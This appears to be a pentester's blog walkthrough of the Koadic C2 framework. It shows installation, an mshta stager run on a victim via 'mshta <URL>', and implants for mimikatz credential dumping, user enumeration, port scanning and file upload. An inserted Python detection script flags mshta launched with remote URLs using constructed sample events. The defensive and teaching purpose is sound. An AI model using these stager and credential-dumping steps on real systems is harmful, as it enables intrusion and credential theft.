Koadic

Today I'd like to write about another post-exploitation kit, the Koadic C2. While it seems like there are dozens of C2 options out there (including Cobalt Strike), I wanted to investigate Koadic anyway. To get started, we can quickly and easily install it via:

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

pip3 install -r requirements.txt

./koadic

Once we are up and running, we will see this menu:

A simple ? will show us the commands we can run:

As you can already see, there are similarities to tools like Empire. It is worth noting that the "victims" are referred to as zombies within this tool. There is also ...taco time?

Ha, I guess it is exactly what it claims to be. Getting serious now, let's get us a zombie!

Step one is to set up a stager. The tool starts you in the mshta stager. According to their video, it is the smallest and most reliable option. So let's type in info and see what options we need to set.

Easily enough, we just need to set our callback host and port. For the demo, let's leave those as default. Once those are set, simply type run to launch the stager. We'll be given a URL which the stager uses to receive zombies. Note that you should not edit this URL.

Now that the stager is running, we switch to our compromised host and use the URL within an mshta command. For the purposes of this demo, we'll have RDP access to the machine. Run mshta <URL> on the victim machine and you'll see a zombie check in on the attacker machine.

And we are successful!
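The check-in above is also what a defender sees from the other side: a fresh mshta.exe process whose command line carries a remote URL, which is the tell-tale of this stager. The following is an added example (not part of the original post and not Koadic's own code) that scans constructed process-creation events for exactly that pattern. The log line format, the hostnames and the 203.0.113.5 URL are all constructed for the example; adapt the parser to whatever your EDR or Sysmon export actually emits.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (not real telemetry). The format is a
# simplified "timestamp|host|parent image|image|command line" line invented for this
# example; event 1 mirrors the "mshta <URL>" launch described in the post.
SAMPLE_EVENTS = """\
2024-01-01T10:00:01|WS01|explorer.exe|C:\\Windows\\System32\\mshta.exe|mshta http://203.0.113.5:9999/example_stager
2024-01-01T10:00:05|WS01|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\admin\\notes.txt
2024-01-01T10:01:10|WS02|cmd.exe|C:\\Windows\\System32\\mshta.exe|mshta.exe "C:\\Program Files\\Vendor\\setup.hta"
2024-01-01T10:02:30|WS02|powershell.exe|C:\\Windows\\System32\\mshta.exe|mshta vbscript:Execute("MsgBox 1")
2024-01-01T10:03:00|WS03|explorer.exe|C:\\Windows\\SysWOW64\\mshta.exe|mshta https://203.0.113.5/s
"""


@dataclass
class Event:
    timestamp: str
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    event: Event
    reason: str


# A remote URL handed to mshta.exe is the remote-stager pattern from the post.
URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# Inline script protocol handlers let mshta run code without any file on disk.
SCRIPT_PROTO_RE = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)


def parse_line(line: str) -> Optional[Event]:
    """Split one pipe-delimited event line; return None for blank or malformed lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return Event(*parts)


def mshta_reason(ev: Event) -> Optional[str]:
    """Return why this event is suspicious, or None if it is not an mshta concern."""
    if ntpath.basename(ev.image).lower() != "mshta.exe":
        return None
    if URL_RE.search(ev.cmdline):
        return "mshta.exe launched with a remote URL (remote HTA stager pattern)"
    if SCRIPT_PROTO_RE.search(ev.cmdline):
        return "mshta.exe launched with an inline script protocol handler"
    # A local .hta path is common for legitimate installers; leave it to baselining.
    return None


def triage(events_text: str) -> List[Finding]:
    """Run the mshta check over every event line and collect the hits in order."""
    findings: List[Finding] = []
    for line in events_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reason = mshta_reason(ev)
        if reason:
            findings.append(Finding(ev, reason))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.event.timestamp} {f.event.host} parent={f.event.parent}: {f.reason}")
        print(f"    {f.event.cmdline}")
```

The local-.hta case is deliberately not flagged: vendor installers use it, and treating every mshta.exe launch as hostile produces noise that gets the rule switched off. Parent process is carried through in each finding so an analyst can see at a glance whether mshta was started from a shell, an Office process or the desktop.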

From here, we can run zombies to see our list of zombies:

We can also get more detailed information by supplying an ID to the zombies command.

Now we should interact with our zombie. We can start with use implant and tab twice to see our options:

The implants are well organized, so we'll just pick inject to start with.

We can then use mimikatz_dotnet2js.

It is kind of neat that there is the option to target ALL zombies. Might make some noise though..

Anyway, all the options look fine, so let's run. The output is pretty standard for the mimikatz command:

We should take a look at some of the other implants we can use.

That screenshot is trash, so let's instead dig into some of the options that stand out.

Starting with implant/gather/ we have some valuable information to collect through our zombie. This includes clipboard data, domain info, shares, users, etc. As an example, to collect the users we can run use implant/gather/enum_users and then run. Interestingly, the results never showed up on my attacker machine. Instead, the job ran for some time and I noticed that the below window had appeared on my victim machine:

So I still got the information I was looking for, just in a strange way. I'm not sure if this is intended or not. We can also run use implant/scan/tcp to run a port scan from our zombie. I just left the defaults and targeted another machine in the lab:

Under implant/util/ we can upload or download a file. I'll create a test file and upload it to the zombie. Similar to the other modules, we just use the module and run options to see what info we need to provide. In this case, it is really just LFILE and the DIRECTORY options. I selected the Administrator's Desktop. Note that using \ caused an error while / was successful.

Over on the zombie, we can see the file on the Desktop:

That's about it for today. I've shown just how easy Koadic is as a C2 tool. I know there are more advanced features such as injecting straight into memory but I'll save that for another post (maybe). Hopefully this post helps you in some way and as always, thanks for reading!

Ryan Smith

About Ryan Smith

Ryan Smith is an information security professional specializing in penetration testing. He has years of experience both as an in-house pen tester and as a consultant.